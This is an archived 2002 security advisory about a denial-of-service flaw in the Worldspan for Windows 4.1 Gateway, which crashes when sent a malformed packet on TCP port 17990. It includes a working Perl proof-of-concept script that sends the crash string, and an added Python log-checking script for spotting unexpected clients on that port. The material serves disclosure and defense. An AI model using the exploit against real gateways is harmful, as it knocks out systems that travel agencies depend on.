5th Jul 2002 [SBWID-5513]
COMMAND
Worldspan DoS
SYSTEMS AFFECTED
Worldspan for Windows 4.1 Gateway
PROBLEM
altomo (nudehackers) [http://www.digitalgangsters.net/] says :
Worldspan is one of the leading companies which creates software for
use by travel agents. Worldspan software is used by many travel
agencies, airlines, and major travel websites. This advisory focuses on
Res Manager (Worldspan for Windows 4.1). A user running Res Manager is
connected to a gateway system at their local site which is then
connected to Worldspan via private lines or the internet. These gateway
systems are the middle man between the agents and Worldspan.
The Worldspan gateways are normally Windows 95 or 98 systems which run
the gateway (gw) software and accept connections from the agents then
process these and send them to the Worldspan systems via private line
or the internet. The gw system uses TCP port 17990 to communicate with
the agents. If a malformed packet is sent to this port the system will attempt
to process it and eventually crash. From the research thus far it
seems the system uses all system resources trying to process this
packet and then crashes. In our lab the systems typically crash within
1 minute.
Proof of Concept
================
#!/usr/bin/perl
#altomo@digitalgangsters.net
#Worldspan Gateway DoS
$sabre = "worldspanshouldgoboom";
use IO::Socket;
$ip = "$ARGV[0]";
$port = "17990";
if ($#ARGV<0) {
print " usage: $0 <ip>\n";
exit();
}
$socket = IO::Socket::INET->new(
Proto=>"tcp",
PeerAddr=>$ip,
PeerPort=>$port,);
print "Worldspan Gateway DoS\n";
print "altomo\@digitalgangsters.net\n";
print "Wait about a minute, and it should crash.\n";
print $socket "$sabre\r";
close $socket;
SOLUTION
None yet, see http://www.worldspan.com/
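With no vendor fix listed, a site can at least watch which hosts reach the gateway port. The following is an added example, not part of the original advisory or any Worldspan tooling: it scans firewall-style connection logs for TCP 17990 connections from sources outside the agent workstation range. The log format, the agent subnet and all addresses are constructed assumptions.

```python
import ipaddress

GATEWAY_PORT = 17990  # TCP port the advisory says the gateway uses for agents

# Assumption: agent workstations live in this subnet (hypothetical value).
AGENT_NETWORKS = [ipaddress.ip_network("192.0.2.0/28")]

# Constructed sample log; assumed format: "time src dst proto dport action".
SAMPLE_LOG = """\
2002-07-05T09:00:01 192.0.2.4 192.0.2.10 tcp 17990 allow
2002-07-05T09:00:07 198.51.100.23 192.0.2.10 tcp 17990 allow
2002-07-05T09:01:12 192.0.2.5 192.0.2.10 tcp 80 allow
2002-07-05T09:02:30 203.0.113.9 192.0.2.10 tcp 17990 deny
malformed line
2002-07-05T09:03:00 192.0.2.200 192.0.2.10 udp 17990 allow
"""


def is_agent(src):
    """True if src falls inside one of the known agent networks."""
    addr = ipaddress.ip_address(src)
    return any(addr in net for net in AGENT_NETWORKS)


def unexpected_gateway_clients(log_text):
    """Return (time, src, action) for TCP 17990 connections from non-agents."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 6:
            continue  # skip lines that do not match the assumed format
        when, src, _dst, proto, dport, action = fields
        if proto.lower() != "tcp" or dport != str(GATEWAY_PORT):
            continue  # only the gateway's agent port is of interest
        try:
            if is_agent(src):
                continue  # expected agent traffic
        except ValueError:
            continue  # source field is not an IP address
        findings.append((when, src, action))
    return findings


if __name__ == "__main__":
    for when, src, action in unexpected_gateway_clients(SAMPLE_LOG):
        print(f"{when} unexpected client {src} -> tcp/{GATEWAY_PORT} ({action})")
```

An "allow" entry in the results means a host outside the agent range was able to reach the gateway port, which is the exposure the advisory depends on.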